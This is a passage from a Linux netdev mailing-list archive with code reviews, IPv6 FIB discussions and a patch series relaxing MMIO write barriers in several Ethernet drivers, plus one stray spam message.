> > 2) How do you get the information you need to configure the PTP device
> 
> Yes, yes.
> 
> > 3) How do you limit the MAC/PHY to what the PTP device can do.
> 
> Hm, I don't think this is important.

So you are happy that the PTP device will cause the MC/PHY link to
break down when it is asked to do something it cannot do? Take for
example a Marvell MAC connected to a Marvell PHY doing 2.5Gbps SGMII
because it can. But say the PTP device cannot be clocked that fast,
and the MII links break You as a PTP maintainer might be happy
with that, but as a PHY maintainer, i'm not too happy with this.

> Right, so phylib can operate on phydev->attached_dev->mdiots;

So first off, it is not an MDIO device. You current code is a horrible
hack which gets a NACK. Use a phandle, and have
of_mdiobus_register_phy() follow the phandle to get the device.

To keep lifecycle issues simple, i would also keep it in phydev, not
netdev.

mdiots as a name is completely wrong. It is not an MDIO device.  Maybe
in the future some devices will be MDIO, or I2C, or SPI. Just call it
ptpdev. This ptpdev needs to be control bus agnostic. You need a
ptpdev core API exposing functions like ptpdev_hwtstamp,
ptpdev_rxtstamp, ptpdev_txtstamp, ptpdev_link_change, which take a
ptpdev. Have phy_link_change call ptpdev_link_change. You have the
flexibility in that if in the future you do care that your ptpdev
breaks the MAC-PHY link, you can add a ptpdev_validate_advertise,
which allows the ptpdev to mask out link modes it does not support.

Your ptp device, when probing needs to register with the ptpdev core,
passing a generic ptpdev_ops for the operations its support. How it
talks to the device, MMIO, SPI, I2C is hidden within the device
driver.

You can then clean up the code in timestamping.c. Code like:

phydev = skb->dev->phydev;
if (likely(phydev->drv->txtstamp)) {
clone = skb_clone_sk(skb);
if (!clone)
return;
phydev->drv->txtstamp(phydev, clone, type);
}

violates the layering, and the locking looks broken. Add a
phy_txtstamp() call to phylib. It can then either call into the PHY
driver, or use the call the ptpdev API, or -EOPNOTSUP.

Andrew

Hello Beautiful

2018-03-25 Thread Jack

Hi Dear, my name is Jack and i am seeking for a relationship in which i will 
feel loved after a series of failed relationships. 

I am hoping that you would be interested and we could possibly get to know each 
other more if you do not mind. I am open to answering questions from you as i 
think my approach is a little inappropriate. Hope to hear back from you.

Jack.

Re: [PATCH RFC net-next 1/7] net: Fix fib notifer to return errno

2018-03-25 Thread Ido Schimmel

On Sun, Mar 25, 2018 at 08:00:19AM -0600, David Ahern wrote:
> On 3/25/18 2:16 AM, Ido Schimmel wrote:
> > On Thu, Mar 22, 2018 at 03:57:51PM -0700, David Ahern wrote:
> >> Notifier handlers use notifier_from_errno to convert any potential error
> >> to an encoded format. As a consequence the other side, call_fib_notifiers
> >> in this case, needs to use notifier_to_errno to return the error from
> >> the handler back to its caller.
> >>
> >> Signed-off-by: David Ahern 
> >> ---
> >>  net/core/fib_notifier.c | 5 -
> >>  1 file changed, 4 insertions(+), 1 deletion(-)
> >>
> >> diff --git a/net/core/fib_notifier.c b/net/core/fib_notifier.c
> >> index 5ace0705a3f9..14ba52ebe8c9 100644
> >> --- a/net/core/fib_notifier.c
> >> +++ b/net/core/fib_notifier.c
> >> @@ -21,8 +21,11 @@ EXPORT_SYMBOL(call_fib_notifier);
> >>  int call_fib_notifiers(struct net *net, enum fib_event_type event_type,
> >>   struct fib_notifier_info *info)
> > 
> > There's another (less interesting case) - call_fib_notifier(), which is
> > used to dump the FIB tables for the caller registering to the
> > notification chain.
> > 
> > For example, if you have a non-default FIB rule in the system and you
> > modprobe mlxsw, you'll get a silent failure and routes will not be
> > offloaded. On the other hand, I'm not sure we want to fail the module
> > loading in such cases.
> 
> right. In normal cases the driver is loaded to create the netdevices
> long before any networking config is done. So it seems to me the use
> case you refer to, some user would have go out of there way to create a
> situation where they install config that is not supported by the driver.

Yes.

> > A possible solution is to have the driver emit a warning via extack for
> > each route/rule being notified after the abort mechanism was triggered.
> 
> extack is not available on module load.

I'm aware. I meant that during module load we'll trigger the abort
mechanism (due to an unsupported FIB rule for example), then when user
configures additional routes and extack is available we'll emit a
warning.

> Per past discussions, something you suggested, we need a message for
> "out-of-line" cases like this where a driver notifies userspace of a
> problem.

That's another possibility. We can implement both options to make it
perfectly clear to users and daemons what's going on.

Re: [PATCH RFC v2 net-next 00/21] net/ipv6: Separate data structures for FIB and data path

2018-03-25 Thread David Ahern

On 3/24/18 9:59 AM, Ido Schimmel wrote:
>> As you know, my preference is to move to nexthop objects (makes fib6_nh
>> optional). I have IPv4 done; IPv6 requires this patch set. 
> 
> After going over your presentation [1] I was under the impression that
> the fib6_info will be optional, not fib6_nh: "Idea is similar to adding
> id to fib_info that is exposed to userspace. Subsequent routes pass id
> to avoid fib_info overhead".

Just using that as an analogy to explain the idea in terms of something
that already exists.

> 
> But I think misunderstood you. You want to introduce the nexthop API
> that will allow you to have multiple fib6_info pointing to the same
> fib6_nh?
> 
> 1. http://vger.kernel.org/netconf2017_files/nexthop-objects.pdf
> 

I see nexthop specs as device, gateway, lwtunnel_state and flags. That's
the basic building block. A nexthop group is multiple nexthops where
each nexthop in the group as its own weight.

The fib_info struct has more than that -- data unrelated to a netxthop
and is really a next level struct.

Re: [PATCH RFC v2 net-next 19/21] net/ipv6: separate handling of FIB entries from dst based routes

2018-03-25 Thread David Ahern

On 3/24/18 10:02 AM, Ido Schimmel wrote:
>>
>> ok, I'll take a look. I thought I verified both paths (fib6_info and
>> dst) were freeing the metrics.
> 
> I get this from kmemleak (applied your patchset on top of fe2d55d295cf):
> 
> unreferenced object 0x88004e2c16c8 (size 96):
> comm "systemd-network", pid 1255, jiffies 4295166424 (age 957.858s)
> hex dump (first 32 bytes):
> 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  
> 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  
> backtrace:
> ip6_route_info_create (/net/ipv6/route.c:2849) 
> ip6_route_add (/net/ipv6/route.c:2975) 
> inet6_rtm_newroute (/net/ipv6/route.c:4357) 
> rtnetlink_rcv_msg (/net/core/rtnetlink.c:4643) 
> netlink_rcv_skb (/net/netlink/af_netlink.c:2445) 
> netlink_unicast (/net/netlink/af_netlink.c:1309 
> /net/netlink/af_netlink.c:1334) 
> netlink_sendmsg (/net/netlink/af_netlink.c:1897) 
> sock_sendmsg (/net/socket.c:630 /net/socket.c:639) 
> SYSC_sendto (/net/socket.c:1748) 
> do_syscall_64 (/arch/x86/entry/common.c:287) 
> entry_SYSCALL_64_after_hwframe (/arch/x86/entry/entry_64.S:239) 
> 0x (/./include/asm-generic/sections.h:42) 
> 

Thanks for confirming. I'll take care of it.

[PATCH v7 5/7] net: qlge: Eliminate duplicate barriers on weakly-ordered archs

2018-03-25 Thread Sinan Kaya

Code includes wmb() followed by writel(). writel() already has a barrier on
some architectures like arm64.

This ends up CPU observing two barriers back to back before executing the
register write.

Create a new wrapper function with relaxed write operator. Use the new
wrapper when a write is following a wmb().

Signed-off-by: Sinan Kaya 
---
 drivers/net/ethernet/qlogic/qlge/qlge.h  | 16 
 drivers/net/ethernet/qlogic/qlge/qlge_main.c |  3 ++-
 2 files changed, 18 insertions(+), 1 deletion(-)

diff --git a/drivers/net/ethernet/qlogic/qlge/qlge.h 
b/drivers/net/ethernet/qlogic/qlge/qlge.h
index 84ac50f..3e71b65 100644
--- a/drivers/net/ethernet/qlogic/qlge/qlge.h
+++ b/drivers/net/ethernet/qlogic/qlge/qlge.h
@@ -2185,6 +2185,22 @@ static inline void ql_write_db_reg(u32 val, void __iomem 
*addr)
 }
 
 /*
+ * Doorbell Registers:
+ * Doorbell registers are virtual registers in the PCI memory space.
+ * The space is allocated by the chip during PCI initialization.  The
+ * device driver finds the doorbell address in BAR 3 in PCI config space.
+ * The registers are used to control outbound and inbound queues. For
+ * example, the producer index for an outbound queue.  Each queue uses
+ * 1 4k chunk of memory.  The lower half of the space is for outbound
+ * queues. The upper half is for inbound queues.
+ * Caller has to guarantee ordering.
+ */
+static inline void ql_write_db_reg_relaxed(u32 val, void __iomem *addr)
+{
+   writel_relaxed(val, addr);
+}
+
+/*
  * Shadow Registers:
  * Outbound queues have a consumer index that is maintained by the chip.
  * Inbound queues have a producer index that is maintained by the chip.
diff --git a/drivers/net/ethernet/qlogic/qlge/qlge_main.c 
b/drivers/net/ethernet/qlogic/qlge/qlge_main.c
index 50038d9..8293c202 100644
--- a/drivers/net/ethernet/qlogic/qlge/qlge_main.c
+++ b/drivers/net/ethernet/qlogic/qlge/qlge_main.c
@@ -2700,7 +2700,8 @@ static netdev_tx_t qlge_send(struct sk_buff *skb, struct 
net_device *ndev)
tx_ring->prod_idx = 0;
wmb();
 
-   ql_write_db_reg(tx_ring->prod_idx, tx_ring->prod_idx_db_reg);
+   ql_write_db_reg_relaxed(tx_ring->prod_idx, tx_ring->prod_idx_db_reg);
+   mmiowb();
netif_printk(qdev, tx_queued, KERN_DEBUG, qdev->ndev,
 "tx queued, slot %d, len %d\n",
 tx_ring->prod_idx, skb->len);
-- 
2.7.4

[PATCH v7 6/7] bnxt_en: Eliminate duplicate barriers on weakly-ordered archs

2018-03-25 Thread Sinan Kaya

Code includes wmb() followed by writel(). writel() already has a barrier on
some architectures like arm64.

This ends up CPU observing two barriers back to back before executing the
register write.

Create a new wrapper function with relaxed write operator. Use the new
wrapper when a write is following a wmb().

Since code already has an explicit barrier call, changing writel() to
writel_relaxed().

Also add mmiowb() so that write code doesn't move outside of scope.

Signed-off-by: Sinan Kaya 
---
 drivers/net/ethernet/broadcom/bnxt/bnxt.c | 2 +-
 drivers/net/ethernet/broadcom/bnxt/bnxt.h | 9 +
 2 files changed, 10 insertions(+), 1 deletion(-)

diff --git a/drivers/net/ethernet/broadcom/bnxt/bnxt.c 
b/drivers/net/ethernet/broadcom/bnxt/bnxt.c
index 1500243..befb538 100644
--- a/drivers/net/ethernet/broadcom/bnxt/bnxt.c
+++ b/drivers/net/ethernet/broadcom/bnxt/bnxt.c
@@ -1922,7 +1922,7 @@ static int bnxt_poll_work(struct bnxt *bp, struct 
bnxt_napi *bnapi, int budget)
/* Sync BD data before updating doorbell */
wmb();
 
-   bnxt_db_write(bp, db, DB_KEY_TX | prod);
+   bnxt_db_write_relaxed(bp, db, DB_KEY_TX | prod);
}
 
cpr->cp_raw_cons = raw_cons;
diff --git a/drivers/net/ethernet/broadcom/bnxt/bnxt.h 
b/drivers/net/ethernet/broadcom/bnxt/bnxt.h
index 1989c47..5e453b9 100644
--- a/drivers/net/ethernet/broadcom/bnxt/bnxt.h
+++ b/drivers/net/ethernet/broadcom/bnxt/bnxt.h
@@ -1401,6 +1401,15 @@ static inline u32 bnxt_tx_avail(struct bnxt *bp, struct 
bnxt_tx_ring_info *txr)
((txr->tx_prod - txr->tx_cons) & bp->tx_ring_mask);
 }
 
+/* For TX and RX ring doorbells with no ordering guarantee*/
+static inline void bnxt_db_write_relaxed(struct bnxt *bp, void __iomem *db,
+u32 val)
+{
+   writel_relaxed(val, db);
+   if (bp->flags & BNXT_FLAG_DOUBLE_DB)
+   writel_relaxed(val, db);
+}
+
 /* For TX and RX ring doorbells */
 static inline void bnxt_db_write(struct bnxt *bp, void __iomem *db, u32 val)
 {
-- 
2.7.4

[PATCH v7 1/7] net: qla3xxx: Eliminate duplicate barriers on weakly-ordered archs

2018-03-25 Thread Sinan Kaya

Code includes wmb() followed by writel(). writel() already has a
barrier on some architectures like arm64.

This ends up CPU observing two barriers back to back before executing
the register write.

Since code already has an explicit barrier call, changing code to

wmb()
writel_relaxed()
mmiowb()

for multi-arch support.

Signed-off-by: Sinan Kaya 
---
 drivers/net/ethernet/qlogic/qla3xxx.c | 5 +++--
 1 file changed, 3 insertions(+), 2 deletions(-)

diff --git a/drivers/net/ethernet/qlogic/qla3xxx.c 
b/drivers/net/ethernet/qlogic/qla3xxx.c
index 9e5264d..b48f761 100644
--- a/drivers/net/ethernet/qlogic/qla3xxx.c
+++ b/drivers/net/ethernet/qlogic/qla3xxx.c
@@ -1858,8 +1858,9 @@ static void ql_update_small_bufq_prod_index(struct 
ql3_adapter *qdev)
qdev->small_buf_release_cnt -= 8;
}
wmb();
-   writel(qdev->small_buf_q_producer_index,
-   &port_regs->CommonRegs.rxSmallQProducerIndex);
+   writel_relaxed(qdev->small_buf_q_producer_index,
+  &port_regs->CommonRegs.rxSmallQProducerIndex);
+   mmiowb();
}
 }
 
-- 
2.7.4

[PATCH v7 2/7] qlcnic: Eliminate duplicate barriers on weakly-ordered archs

2018-03-25 Thread Sinan Kaya

Code includes wmb() followed by writel(). writel() already has a
barrier on some architectures like arm64.

This ends up CPU observing two barriers back to back before executing
the register write.

Since code already has an explicit barrier call, changing writel() to
writel_relaxed().

Signed-off-by: Sinan Kaya 
Acked-by: Manish Chopra 
---
 drivers/net/ethernet/qlogic/qlcnic/qlcnic_83xx_hw.c | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/drivers/net/ethernet/qlogic/qlcnic/qlcnic_83xx_hw.c 
b/drivers/net/ethernet/qlogic/qlcnic/qlcnic_83xx_hw.c
index 46b0372..97c146e7 100644
--- a/drivers/net/ethernet/qlogic/qlcnic/qlcnic_83xx_hw.c
+++ b/drivers/net/ethernet/qlogic/qlcnic/qlcnic_83xx_hw.c
@@ -478,7 +478,7 @@ irqreturn_t qlcnic_83xx_clear_legacy_intr(struct 
qlcnic_adapter *adapter)
wmb();
 
/* clear the interrupt trigger control register */
-   writel(0, adapter->isr_int_vec);
+   writel_relaxed(0, adapter->isr_int_vec);
intr_val = readl(adapter->isr_int_vec);
do {
intr_val = readl(adapter->tgt_status_reg);
-- 
2.7.4

[PATCH v7 4/7] bnx2x: Eliminate duplicate barriers on weakly-ordered archs

2018-03-25 Thread Sinan Kaya

Code includes wmb() followed by writel(). writel() already has a
barrier on some architectures like arm64.

This ends up CPU observing two barriers back to back before executing
the register write.

Since code already has an explicit barrier call, changing writel() to
writel_relaxed().

Signed-off-by: Sinan Kaya 
---
 drivers/net/ethernet/broadcom/bnx2x/bnx2x.h | 12 
 drivers/net/ethernet/broadcom/bnx2x/bnx2x_cmn.c |  2 +-
 drivers/net/ethernet/broadcom/bnx2x/bnx2x_cmn.h |  4 ++--
 drivers/net/ethernet/broadcom/bnx2x/bnx2x_ethtool.c |  2 +-
 drivers/net/ethernet/broadcom/bnx2x/bnx2x_main.c|  4 ++--
 drivers/net/ethernet/broadcom/bnx2x/bnx2x_vfpf.c|  4 +++-
 6 files changed, 17 insertions(+), 11 deletions(-)

diff --git a/drivers/net/ethernet/broadcom/bnx2x/bnx2x.h 
b/drivers/net/ethernet/broadcom/bnx2x/bnx2x.h
index 352beff..d847e1b 100644
--- a/drivers/net/ethernet/broadcom/bnx2x/bnx2x.h
+++ b/drivers/net/ethernet/broadcom/bnx2x/bnx2x.h
@@ -166,6 +166,12 @@ do {   \
 #define REG_RD8(bp, offset)readb(REG_ADDR(bp, offset))
 #define REG_RD16(bp, offset)   readw(REG_ADDR(bp, offset))
 
+#define REG_WR_RELAXED(bp, offset, val)\
+   writel_relaxed((u32)val, REG_ADDR(bp, offset))
+
+#define REG_WR16_RELAXED(bp, offset, val) \
+   writew_relaxed((u16)val, REG_ADDR(bp, offset))
+
 #define REG_WR(bp, offset, val)writel((u32)val, REG_ADDR(bp, 
offset))
 #define REG_WR8(bp, offset, val)   writeb((u8)val, REG_ADDR(bp, offset))
 #define REG_WR16(bp, offset, val)  writew((u16)val, REG_ADDR(bp, offset))
@@ -758,10 +764,8 @@ struct bnx2x_fastpath {
 #if (BNX2X_DB_SHIFT < BNX2X_DB_MIN_SHIFT)
 #error "Min DB doorbell stride is 8"
 #endif
-#define DOORBELL(bp, cid, val) \
-   do { \
-   writel((u32)(val), bp->doorbells + (bp->db_size * (cid))); \
-   } while (0)
+#define DOORBELL_RELAXED(bp, cid, val) \
+   writel_relaxed((u32)(val), (bp)->doorbells + ((bp)->db_size * (cid)))
 
 /* TX CSUM helpers */
 #define SKB_CS_OFF(skb)(offsetof(struct tcphdr, check) - \
diff --git a/drivers/net/ethernet/broadcom/bnx2x/bnx2x_cmn.c 
b/drivers/net/ethernet/broadcom/bnx2x/bnx2x_cmn.c
index 0f86f18..95871576 100644
--- a/drivers/net/ethernet/broadcom/bnx2x/bnx2x_cmn.c
+++ b/drivers/net/ethernet/broadcom/bnx2x/bnx2x_cmn.c
@@ -4156,7 +4156,7 @@ netdev_tx_t bnx2x_start_xmit(struct sk_buff *skb, struct 
net_device *dev)
/* make sure descriptor update is observed by HW */
wmb();
 
-   DOORBELL(bp, txdata->cid, txdata->tx_db.raw);
+   DOORBELL_RELAXED(bp, txdata->cid, txdata->tx_db.raw);
 
mmiowb();
 
diff --git a/drivers/net/ethernet/broadcom/bnx2x/bnx2x_cmn.h 
b/drivers/net/ethernet/broadcom/bnx2x/bnx2x_cmn.h
index a5265e1..a8ce5c5 100644
--- a/drivers/net/ethernet/broadcom/bnx2x/bnx2x_cmn.h
+++ b/drivers/net/ethernet/broadcom/bnx2x/bnx2x_cmn.h
@@ -522,8 +522,8 @@ static inline void bnx2x_update_rx_prod(struct bnx2x *bp,
wmb();
 
for (i = 0; i < sizeof(rx_prods)/4; i++)
-   REG_WR(bp, fp->ustorm_rx_prods_offset + i*4,
-  ((u32 *)&rx_prods)[i]);
+   REG_WR_RELAXED(bp, fp->ustorm_rx_prods_offset + i * 4,
+  ((u32 *)&rx_prods)[i]);
 
mmiowb(); /* keep prod updates ordered */
 
diff --git a/drivers/net/ethernet/broadcom/bnx2x/bnx2x_ethtool.c 
b/drivers/net/ethernet/broadcom/bnx2x/bnx2x_ethtool.c
index 39af4f8..da18aa2 100644
--- a/drivers/net/ethernet/broadcom/bnx2x/bnx2x_ethtool.c
+++ b/drivers/net/ethernet/broadcom/bnx2x/bnx2x_ethtool.c
@@ -2593,7 +2593,7 @@ static int bnx2x_run_loopback(struct bnx2x *bp, int 
loopback_mode)
txdata->tx_db.data.prod += 2;
/* make sure descriptor update is observed by the HW */
wmb();
-   DOORBELL(bp, txdata->cid, txdata->tx_db.raw);
+   DOORBELL_RELAXED(bp, txdata->cid, txdata->tx_db.raw);
 
mmiowb();
barrier();
diff --git a/drivers/net/ethernet/broadcom/bnx2x/bnx2x_main.c 
b/drivers/net/ethernet/broadcom/bnx2x/bnx2x_main.c
index 74fc9af..146c40d 100644
--- a/drivers/net/ethernet/broadcom/bnx2x/bnx2x_main.c
+++ b/drivers/net/ethernet/broadcom/bnx2x/bnx2x_main.c
@@ -3817,8 +3817,8 @@ static void bnx2x_sp_prod_update(struct bnx2x *bp)
 */
mb();
 
-   REG_WR16(bp, BAR_XSTRORM_INTMEM + XSTORM_SPQ_PROD_OFFSET(func),
-bp->spq_prod_idx);
+   REG_WR16_RELAXED(bp, BAR_XSTRORM_INTMEM + XSTORM_SPQ_PROD_OFFSET(func),
+bp->spq_prod_idx);
mmiowb();
 }
 
diff --git a/drivers/net/ethernet/broadcom/bnx2x/bnx2x_vfpf.c 
b/drivers/net/ethernet/broadcom/bnx2x/bnx2x_vfpf.c
index 76a4668..8e0a317 100644
--- a/drivers/net/ethernet/broadcom/bnx2x/bnx2x_vfpf.c
+++ b/drivers/net/ethernet/broadcom/bnx2x/bnx2x_vfpf.c
@@ -170,7 +170,9 @@ static int bnx2x_send_msg2pf(struct bnx2x *bp, u8 *done, 
dma_addr_t msg_mapping)

[PATCH v7 3/7] bnx2x: Replace doorbell barrier() with wmb()

2018-03-25 Thread Sinan Kaya

barrier() doesn't guarantee memory writes to be observed by the hardware on
all architectures. barrier() only tells compiler not to move this code
with respect to other read/writes.

If memory write needs to be observed by the HW, wmb() is the right choice.

Signed-off-by: Sinan Kaya 
---
 drivers/net/ethernet/broadcom/bnx2x/bnx2x_cmn.c | 3 ++-
 drivers/net/ethernet/broadcom/bnx2x/bnx2x_ethtool.c | 3 ++-
 2 files changed, 4 insertions(+), 2 deletions(-)

diff --git a/drivers/net/ethernet/broadcom/bnx2x/bnx2x_cmn.c 
b/drivers/net/ethernet/broadcom/bnx2x/bnx2x_cmn.c
index d7c98e8..0f86f18 100644
--- a/drivers/net/ethernet/broadcom/bnx2x/bnx2x_cmn.c
+++ b/drivers/net/ethernet/broadcom/bnx2x/bnx2x_cmn.c
@@ -4153,7 +4153,8 @@ netdev_tx_t bnx2x_start_xmit(struct sk_buff *skb, struct 
net_device *dev)
wmb();
 
txdata->tx_db.data.prod += nbd;
-   barrier();
+   /* make sure descriptor update is observed by HW */
+   wmb();
 
DOORBELL(bp, txdata->cid, txdata->tx_db.raw);
 
diff --git a/drivers/net/ethernet/broadcom/bnx2x/bnx2x_ethtool.c 
b/drivers/net/ethernet/broadcom/bnx2x/bnx2x_ethtool.c
index 1e33abd..39af4f8 100644
--- a/drivers/net/ethernet/broadcom/bnx2x/bnx2x_ethtool.c
+++ b/drivers/net/ethernet/broadcom/bnx2x/bnx2x_ethtool.c
@@ -2591,7 +2591,8 @@ static int bnx2x_run_loopback(struct bnx2x *bp, int 
loopback_mode)
wmb();
 
txdata->tx_db.data.prod += 2;
-   barrier();
+   /* make sure descriptor update is observed by the HW */
+   wmb();
DOORBELL(bp, txdata->cid, txdata->tx_db.raw);
 
mmiowb();
-- 
2.7.4

[PATCH v7 7/7] net: ena: Eliminate duplicate barriers on weakly-ordered archs

2018-03-25 Thread Sinan Kaya

Code includes barrier() followed by writel(). writel() already has a
barrier on some architectures like arm64.

This ends up CPU observing two barriers back to back before executing the
register write.

Create a new wrapper function with relaxed write operator. Use the new
wrapper when a write is following a barrier().

Since code already has an explicit barrier call, changing writel() to
writel_relaxed() and adding mmiowb() for ordering protection.

Signed-off-by: Sinan Kaya 
---
 drivers/net/ethernet/amazon/ena/ena_com.c | 8 ++--
 drivers/net/ethernet/amazon/ena/ena_eth_com.h | 8 ++--
 drivers/net/ethernet/amazon/ena/ena_netdev.c  | 5 +++--
 3 files changed, 15 insertions(+), 6 deletions(-)

diff --git a/drivers/net/ethernet/amazon/ena/ena_com.c 
b/drivers/net/ethernet/amazon/ena/ena_com.c
index bf2de52..1b9d3130 100644
--- a/drivers/net/ethernet/amazon/ena/ena_com.c
+++ b/drivers/net/ethernet/amazon/ena/ena_com.c
@@ -631,8 +631,10 @@ static u32 ena_com_reg_bar_read32(struct ena_com_dev 
*ena_dev, u16 offset)
 */
wmb();
 
-   writel(mmio_read_reg, ena_dev->reg_bar + ENA_REGS_MMIO_REG_READ_OFF);
+   writel_relaxed(mmio_read_reg,
+  ena_dev->reg_bar + ENA_REGS_MMIO_REG_READ_OFF);
 
+   mmiowb();
for (i = 0; i < timeout; i++) {
if (read_resp->req_id == mmio_read->seq_num)
break;
@@ -1826,7 +1828,9 @@ void ena_com_aenq_intr_handler(struct ena_com_dev *dev, 
void *data)
 
/* write the aenq doorbell after all AENQ descriptors were read */
mb();
-   writel((u32)aenq->head, dev->reg_bar + ENA_REGS_AENQ_HEAD_DB_OFF);
+   writel_relaxed((u32)aenq->head,
+  dev->reg_bar + ENA_REGS_AENQ_HEAD_DB_OFF);
+   mmiowb();
 }
 
 int ena_com_dev_reset(struct ena_com_dev *ena_dev,
diff --git a/drivers/net/ethernet/amazon/ena/ena_eth_com.h 
b/drivers/net/ethernet/amazon/ena/ena_eth_com.h
index 2f76572..6fdc753 100644
--- a/drivers/net/ethernet/amazon/ena/ena_eth_com.h
+++ b/drivers/net/ethernet/amazon/ena/ena_eth_com.h
@@ -107,7 +107,8 @@ static inline int ena_com_sq_empty_space(struct 
ena_com_io_sq *io_sq)
return io_sq->q_depth - 1 - cnt;
 }
 
-static inline int ena_com_write_sq_doorbell(struct ena_com_io_sq *io_sq)
+static inline int ena_com_write_sq_doorbell(struct ena_com_io_sq *io_sq,
+   bool relaxed)
 {
u16 tail;
 
@@ -116,7 +117,10 @@ static inline int ena_com_write_sq_doorbell(struct 
ena_com_io_sq *io_sq)
pr_debug("write submission queue doorbell for queue: %d tail: %d\n",
 io_sq->qid, tail);
 
-   writel(tail, io_sq->db_addr);
+   if (relaxed)
+   writel_relaxed(tail, io_sq->db_addr);
+   else
+   writel(tail, io_sq->db_addr);
 
return 0;
 }
diff --git a/drivers/net/ethernet/amazon/ena/ena_netdev.c 
b/drivers/net/ethernet/amazon/ena/ena_netdev.c
index 6975150..a822e70 100644
--- a/drivers/net/ethernet/amazon/ena/ena_netdev.c
+++ b/drivers/net/ethernet/amazon/ena/ena_netdev.c
@@ -556,7 +556,8 @@ static int ena_refill_rx_bufs(struct ena_ring *rx_ring, u32 
num)
 * issue a doorbell
 */
wmb();
-   ena_com_write_sq_doorbell(rx_ring->ena_com_io_sq);
+   ena_com_write_sq_doorbell(rx_ring->ena_com_io_sq, true);
+   mmiowb();
}
 
rx_ring->next_to_use = next_to_use;
@@ -2151,7 +2152,7 @@ static netdev_tx_t ena_start_xmit(struct sk_buff *skb, 
struct net_device *dev)
 
if (netif_xmit_stopped(txq) || !skb->xmit_more) {
/* trigger the dma engine */
-   ena_com_write_sq_doorbell(tx_ring->ena_com_io_sq);
+   ena_com_write_sq_doorbell(tx_ring->ena_com_io_sq, false);
u64_stats_update_begin(&tx_ring->syncp);
tx_ring->tx_stats.doorbells++;
u64_stats_update_end(&tx_ring->syncp);
-- 
2.7.4

[PATCH v7 0/7] netdev: Eliminate duplicate barriers on weakly-ordered archs

2018-03-25 Thread Sinan Kaya

Code includes wmb() followed by writel() in multiple places. writel()
already has a barrier on some architectures like arm64.

This ends up CPU observing two barriers back to back before executing the
register write.

Since code already has an explicit barrier call, changing writel() to
writel_relaxed().

I did a regex search for wmb() followed by writel() in each drivers
directory.
I scrubbed the ones I care about in this series.

I considered "ease of change", "popular usage" and "performance critical
path" as the determining criteria for my filtering.

We used relaxed API heavily on ARM for a long time but
it did not exist on other architectures. For this reason, relaxed
architectures have been paying double penalty in order to use the common
drivers.

Now that relaxed API is present on all architectures, we can go and scrub
all drivers to see what needs to change and what can remain.

We start with mostly used ones and hope to increase the coverage over time.
It will take a while to cover all drivers.

Feel free to apply patches individually.

Changes since v6:
- bring back amazon ena and add mmiowb, remove
  ena_com_write_sq_doorbell_rel(). 
- remove extra mmiowb in bnx2x
- correct spelling mistake in  bnx2x: Replace doorbell barrier() with wmb()


Sinan Kaya (7):
  net: qla3xxx: Eliminate duplicate barriers on weakly-ordered archs
  qlcnic: Eliminate duplicate barriers on weakly-ordered archs
  bnx2x: Replace doorbell barrier() with wmb()
  bnx2x: Eliminate duplicate barriers on weakly-ordered archs
  net: qlge: Eliminate duplicate barriers on weakly-ordered archs
  bnxt_en: Eliminate duplicate barriers on weakly-ordered archs
  net: ena: Eliminate duplicate barriers on weakly-ordered archs

 drivers/net/ethernet/amazon/ena/ena_com.c   |  8 ++--
 drivers/net/ethernet/amazon/ena/ena_eth_com.h   |  8 ++--
 drivers/net/ethernet/amazon/ena/ena_netdev.c|  5 +++--
 drivers/net/ethernet/broadcom/bnx2x/bnx2x.h | 12 
 drivers/net/ethernet/broadcom/bnx2x/bnx2x_cmn.c |  5 +++--
 drivers/net/ethernet/broadcom/bnx2x/bnx2x_cmn.h |  4 ++--
 drivers/net/ethernet/broadcom/bnx2x/bnx2x_ethtool.c |  5 +++--
 drivers/net/ethernet/broadcom/bnx2x/bnx2x_main.c|  4 ++--
 drivers/net/ethernet/broadcom/bnx2x/bnx2x_vfpf.c|  4 +++-
 drivers/net/ethernet/broadcom/bnxt/bnxt.c   |  2 +-
 drivers/net/ethernet/broadcom/bnxt/bnxt.h   |  9 +
 drivers/net/ethernet/qlogic/qla3xxx.c   |  5 +++--
 drivers/net/ethernet/qlogic/qlcnic/qlcnic_83xx_hw.c |  2 +-
 drivers/net/ethernet/qlogic/qlge/qlge.h | 16 
 drivers/net/ethernet/qlogic/qlge/qlge_main.c|  3 ++-
 15 files changed, 68 insertions(+), 24 deletions(-)

-- 
2.7.4

Re: [PATCH net] nfp: use full 40 bits of the NSP buffer address

2018-03-25 Thread Jakub Kicinski

On Fri, 23 Mar 2018 19:42:22 -0700, Jakub Kicinski wrote:
> From: Dirk van der Merwe 
> 
> The NSP default buffer is a piece of NFP memory where additional
> command data can be placed.  Its format has been copied from
> host buffer, but the PCIe selection bits do not make sense in
> this case.  If those get masked out from a NFP address - writes
> to random place in the chip memory may be issued and crash the
> device.
> 
> This has never been an issue because the buffer used to be
> allocated in memory with less-than-38-bit-long address but that
> is about to change.
> 
> Signed-off-by: Dirk van der Merwe 
> Signed-off-by: Jakub Kicinski 
> ---
>  drivers/net/ethernet/netronome/nfp/nfpcore/nfp_nsp.c | 3 +--
>  1 file changed, 1 insertion(+), 2 deletions(-)
> 
> diff --git a/drivers/net/ethernet/netronome/nfp/nfpcore/nfp_nsp.c 
> b/drivers/net/ethernet/netronome/nfp/nfpcore/nfp_nsp.c
> index 39abac678b71..b54ab02f5b33 100644
> --- a/drivers/net/ethernet/netronome/nfp/nfpcore/nfp_nsp.c
> +++ b/drivers/net/ethernet/netronome/nfp/nfpcore/nfp_nsp.c
> @@ -71,8 +71,7 @@
>  /* CPP address to retrieve the data from */
>  #define NSP_BUFFER   0x10
>  #define   NSP_BUFFER_CPP GENMASK_ULL(63, 40)
> -#define   NSP_BUFFER_PCIEGENMASK_ULL(39, 38)
> -#define   NSP_BUFFER_ADDRESS GENMASK_ULL(37, 0)
> +#define   NSP_BUFFER_ADDRESS GENMASK_ULL(39, 0)

self-nack, this is changing a shared define for all bufs, adding a new
define of NFP buf will be cleaner.

Re: [PATCH RFC net-next 7/7] netdevsim: Add simple FIB resource controller via devlink

2018-03-25 Thread David Ahern

On 3/25/18 12:35 AM, Jakub Kicinski wrote:
> On Sat, 24 Mar 2018 09:02:45 -0600, David Ahern wrote:
 diff --git a/drivers/net/netdevsim/Makefile 
 b/drivers/net/netdevsim/Makefile
 index 09388c06171d..449b2a1a1800 100644
 --- a/drivers/net/netdevsim/Makefile
 +++ b/drivers/net/netdevsim/Makefile
 @@ -9,3 +9,7 @@ ifeq ($(CONFIG_BPF_SYSCALL),y)
